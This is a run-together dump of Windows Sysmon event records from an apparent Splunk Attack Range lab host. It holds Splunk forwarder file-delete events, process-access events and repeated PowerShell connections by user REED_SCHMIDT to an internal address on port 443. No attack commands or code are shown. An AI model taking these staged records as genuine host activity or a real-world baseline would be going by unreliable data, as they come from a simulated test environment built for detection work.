AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084814Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:45.855{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=381158029610BE3473977898CD735E9C,SHA256=F549BA14619719AB29558F483502BD346BAA29ABAC3D7C45E9F61667BCF14B9A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084813Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:45.838{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3FDB786973BA99A20DEBDAE9C611806F,SHA256=09A2B51C527A2C2A3746475B274215D85C8BC16F39C81D6E0E388FCAB71A7EF1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084817Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:46.873{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=823A8E2D2E8620BA52C2360A11A99B17,SHA256=168477F653B85F660FBB0D1416A982699F1E4B84ADE50570ECA2CD6B83C88FB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084816Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:11.292{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56653-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084815Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:46.273{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A139B3714B3EA78D3C440689D0B09D56,SHA256=1E578EFFD57D30E3CF575AF5513D809AE6D88CDDD13AD412BEC6A9992CA0BEB7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084818Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:47.889{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80A54233B1D937B083575B5D069FDF37,SHA256=78CC3B209771A01DE166D8199AE9229063980E0D62D6942224C861C5D3E9C7D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084820Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:48.904{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1CF23EB6C298083ECA033B63E68485A,SHA256=CECDDC1760B6FF90AC8910BC866CF5C8F498EF6DCBC675F475E1EEF0B4D9908E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084819Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.156{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56654-false10.0.1.12-8000- 23542300x800000000000000035084821Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:49.936{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D39C16385F11ADEDA444D61AEF5294AE,SHA256=7801C05ED3C7DD8B80190F3CAD8B745A2F1BBDABC584EA9D8F38EF3CF0259E7F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084824Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:50.939{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3029EC7AEA7DA0A4E5D40817E4E80C4,SHA256=526A1FA006B49F768786F77B9DAE310A6772BF29103B63F7DD35C7784E5BE84E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084823Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:15.293{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56655-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084822Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:50.286{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D0FFB2BC754920F1DF70BE75607BE8BA,SHA256=215E39A577E2589B97E0735D4FF9FBBC5C4E860DF018FE92BA5AF333BC47D1CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084825Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:51.986{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C19B8CCF3BA9EA7C4E1B889BDC9FEC77,SHA256=C7A8969709935194CF97AFA5ADA998D7A286CAD017B4EE4DED9A69F978830DEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084826Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:53.000{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C088B0320DB754D42E2EB8A56E0F28D,SHA256=40842E77A115DF52F6BF413A4F3B6A1229D8A9CBC2A4395549FD5C96583E7B36,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084829Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:19.074{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56656-false10.0.1.12-8000- 23542300x800000000000000035084828Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:54.882{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084827Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:54.033{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C39813E140DD2108DBF7D426D284058,SHA256=CC6BD3437E13C614849ACF8A333BA43D2058D625A92B46660E06C51F34D79B04,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084830Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:55.069{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECB45B9A7CE4A634FFEE8EA9F4F18D1E,SHA256=61FA5D7CF8E625A2B208F5AB335B7A713297461A0CB801EA34416638F10F197A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084832Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:56.282{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=63C676EF6D61AE27D8A51EE96853B3F9,SHA256=7AC8E6F980B8765DFE600C5DA38AC142C2ECCB7AD77EB6E01E445446E9EDD566,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084831Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:56.114{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07A8499229B8286491C1B9550D42E215,SHA256=23847BBC4FAA480E8D132CDF4CD2F208B6B62C08B22D5D3BC41FF872AC04C0DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084836Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:57.334{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BD5A49E680AD92C2C1E686EE0769F8B,SHA256=0C072113E289A2B61A0140C01F55C957D7877B72AD82FD900BC5F23CE139FD6C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084835Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:57.151{B81B27B7-4012-611D-0D00-00000000C801}7922908C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035084834Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:21.303{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56658-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035084833Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:20.887{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56657-false10.0.1.12-8089- 23542300x800000000000000035084837Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:58.366{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E01C590ABFF543417069C599C7BF7148,SHA256=A0EF6DFD961A3EE2EAD0838540E508AC6FE200958B427ED7185D99315F93748C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084838Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:59.380{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC91D6F700E9C32DC8E580508FBEB87E,SHA256=E2E28A850A53A638C32D09D6BDAD7138B182DB6479299F4275053344048B5BA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084839Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:00.395{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3514C005BF4BB03606525F9AA741A2C6,SHA256=67D31E66342BBC3C9498FCF931B2DA0EA0B1FDD22305A8F81B0D3C1543F1BB25,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084841Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:01.409{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53F9DE3FAE9193FA4B903FF8A5DDABAD,SHA256=9F7C4E380A79698404D7C3AF11D8BCC9E53CD659033847C258253A527565C3D3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084840Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:25.101{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56659-false10.0.1.12-8000- 23542300x800000000000000035084843Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:02.413{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA17421752B959316194DCD112350333,SHA256=178CAFDAF61EF14699ABC9EB398BA1F88308BACEDB08562A8FAC0889DD835EFF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084842Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:02.297{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BA554913BB133D47FBF847D6ABD84BAF,SHA256=24978B8304ED85AE01ED3C508DF3ECD63F2AEECF609FFA90DFA703614E5F98C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084845Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:03.430{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FE61DE65C774FCECC2CAD045A379AE8,SHA256=23A85E15E9BEA8427B6BCC9CD873BD2AB9C1AA9D5D2A471E87557F9543A7A0B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084844Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:27.315{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56660-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084846Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:04.448{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF4661F55CCFCDDB733D28B41374292E,SHA256=D34AB83EEED1C429CC4983F1CC0FFEB64802FD0F3B064B949A72F1C686520883,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084847Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:05.479{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CD63DBCB4FF011E0E2AD54F46D1732B,SHA256=90EED5BBD03C669C6F2C509AC1CFED0BCEFB541147AD8CF16CF61DAC2669E774,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084849Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:31.050{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56661-false10.0.1.12-8000- 23542300x800000000000000035084848Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:06.493{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC0248C5A9FF5F9C38DFBA94D721632F,SHA256=2D84CE4C4B0FC40E2E7F60B9122CB63886C5BB4EE7BC3B0C7822366D4A28A8AF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084850Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:07.508{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A060707FE774AF123B3FDF0706608B6,SHA256=589A384C17DEF706E0D9D8A9C6BD210AE0DEB7DF721623E9176CCF8814886246,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084852Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:08.510{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C38FA56C95529A7132FD7F9B3AF6BD6,SHA256=7568586D7D9F3A5A926F65D6C5541ED8759D911A24F092D3937EF39AB79ECE8D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084851Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:08.329{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E08CDC1B6EB636A43D84A8E4A04E23A9,SHA256=1DB18D0AC35169843583EF0986B3BE9415D7E507721085299B53D1F3C04607E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084854Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:33.330{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56662-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084853Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:09.525{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DCCA1D1AC172701C0C1C14643E155C8,SHA256=8D04155E8D118B6ADB1A04A96F33F7668C469996071B6F8B8264CF920939FEAF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084855Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:10.545{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB010711ACF6FE70FDF4A634EAD337E3,SHA256=1EE2D647632CE97640AE161267F828FA93C0498221270B3349A91C26AB94D18F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084857Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:36.113{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56663-false10.0.1.12-8000- 23542300x800000000000000035084856Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:11.575{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A522A8CF6F84A6913DFCD6FD695016F,SHA256=42901EA0772064136C808B359647CEBAB4EC135BD9D4A6EC616BBEEEF909EB9C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084858Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:12.606{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9DF65C49FA144033D210DDA74A48402,SHA256=75608958DB545438AE33F1991B70FAA23C8C2A8AC44E876D97ABC971AB0DCA10,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084876Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.973{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4EB9-613A-4B90-03000000C801}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084875Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.973{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084874Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.973{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084873Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 